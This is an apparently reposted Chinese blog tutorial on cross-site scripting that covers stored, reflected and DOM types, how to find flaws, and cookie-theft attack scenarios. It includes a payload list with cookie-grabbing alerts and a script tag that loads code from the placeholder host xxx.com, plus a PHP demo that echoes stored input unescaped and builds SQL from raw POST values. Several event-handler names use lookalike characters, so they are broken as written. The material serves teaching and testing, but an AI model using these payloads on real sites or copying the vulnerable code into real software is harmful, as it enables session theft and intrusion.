XSS(跨站脚本攻击)详解(XSS跨站脚本攻击剖析与防御)

XSS的原理和分类

跨站脚本攻击XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击！ XSS分为：存储型 、反射型 、DOM型XSS

存储型XSS：

存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie 反射型XSS：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。 DOM型XSS：不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。 DOM的详解：DOM文档对象模型 可能触发DOM型XSS的属性

document.referer window.name location innerHTML documen.write

如图，我们在URL中传入参数的值，然后客户端页面通过js脚本利用DOM的方法获得URL中参数的值，再通过DOM方法赋值给选择列表，该过程没有经过后端，完全是在前端完成的。所以，我们就可以在我们输入的参数上做手脚了。

XSS的攻击载荷

以下所有标签的 > 都可以用 // 代替， 例如 alert(1)标签：标签是最直接的XSS有效载荷，脚本标记可以引用外部的JavaScript代码，也可以将代码插入脚本标记中

以下所有标签的 > 都可以用 // 代替， 例如 <script>alert(1)</script//

<script>标签：<script>标签是最直接的XSS有效载荷，脚本标记可以引用外部的JavaScript代码，也可以将代码插入脚本标记中

<script>alert("hack")</script>   #弹出hack
<script>alert(/hack/)</script>   #弹出hack
<script>alert(1)</script>        #弹出1，对于数字可以不用引号
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com/xss.js></script>  #引用外部的xss

svg标签 

<svg onload="alert(1)">
<svg onload="alert(1)"//

<img>标签：

<img  src=1  οnerrοr=alert("hack")>
<img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

 <body>标签：

<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>

video标签:

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

style标签：

<style οnlοad=alert(1)></style>

#用户输入作为标签属性值，导致攻击者可以进行闭合绕过

XSS漏洞的挖掘

黑盒测试 尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些： URL的每一个参数 URL本身 表单 搜索框 常见业务场景 重灾区：评论区、留言区、个人信息、订单信息等 针对型：站内信、网页即时通讯、私信、意见反馈 存在风险：搜索框、当前目录、图片属性等 白盒测试(代码审计) 关于XSS的代码审计主要就是从接收参数的地方和一些关键词入手。 PHP中常见的接收参数的方式有$_GET、$_POST、$_REQUEST等等，可以搜索所有接收参数的地方。然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看输出到页面中的数据是否进行了过滤和html编码等处理。 也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取的，是否能控制存到数据库中的数据，存到数据库之前有没有进行过滤等等。 大多数程序会对接收参数封装在公共文件的函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等。 同理审计DOM型注入可以搜索一些js操作DOM元素的关键词进行审计。 XSS的攻击过程 反射型XSS漏洞： Alice经常浏览某个网站，此网站为Bob所拥有。Bob的站点需要Alice使用用户名/密码进行登录，并存储了Alice敏感信息(比如银行帐户信息)。 Tom 发现 Bob的站点存在反射性的XSS漏洞 Tom 利用Bob网站的反射型XSS漏洞编写了一个exp，做成链接的形式，并利用各种手段诱使Alice点击 Alice在登录到Bob的站点后，浏览了 Tom 提供的恶意链接 嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行。此脚本盗窃敏感信息(cookie、帐号信息等信息)。然后在Alice完全不知情的情况下将这些信息发送给 Tom。 Tom 利用获取到的cookie就可以以Alice的身份登录Bob的站点，如果脚本的功更强大的话，Tom 还可以对Alice的浏览器做控制并进一步利用漏洞控制 存储型XSS漏洞： Bob拥有一个Web站点，该站点允许用户发布信息/浏览已发布的信息。 Tom检测到Bob的站点存在存储型的XSS漏洞。 Tom在Bob的网站上发布一个带有恶意脚本的热点信息，该热点信息存储在了Bob的服务器的数据库中，然后吸引其它用户来阅读该热点信息。 Bob或者是任何的其他人如Alice浏览该信息之后,Tom的恶意脚本就会执行。 Tom的恶意脚本执行后，Tom就可以对浏览器该页面的用户发动一起XSS攻击 XSS漏洞的危害 从以上我们可以知道，存储型的XSS危害最大。因为他存储在服务器端，所以不需要我们和被攻击者有任何接触，只要被攻击者访问了该页面就会遭受攻击。而反射型和DOM型的XSS则需要我们去诱使用户点击我们构造的恶意的URL，需要我们和用户有直接或者间接的接触，比如利用社会工程学或者利用在其他网页挂马的方式。 那么，利用XSS漏洞可以干什么呢？

XSS漏洞的简单攻击测试

 反射型XSS： 先放出源代码

前端：2.html
<form action="action2.php" method="post">输入你的ID： <input type="text"> <br>输入你的Name：<input type="text"> <br><input type="submit" value="提交"></form>
<p><strong id="xx">
 

后端：

//后端：action2.php 
<!--?php
	$id=$_POST["id"];
	$name=$_POST["name"];
	mysql_connect("localhost","root","root");
	mysql_select_db("test");
	
	$sql="insert into xss value ($id,'$name')";
	$result=mysql_query($sql);
?--> //供其他用户访问页面：show2.php <!--?php
	mysql_connect("localhost","root","root");
	mysql_select_db("test");
	$sql="select * from xss where id=1";
	$result=mysql_query($sql);
	while($row=mysql_fetch_array($result)){
		echo $row['name'];
	}
?-->

这里有一个用户提交的页面，用户可以在此提交数据，数据提交之后给后台处理 

所以，我们可以在输入框中提交数据： alert('hack') ，看看会有什么反应

页面直接弹出了hack的页面，可以看到，我们插入的语句已经被页面给执行了。 这就是最基本的反射型的XSS漏洞，这种漏洞数据流向是： 前端-->后端-->前端

转载https://www.cnblogs.com/csnd/p/11807592.html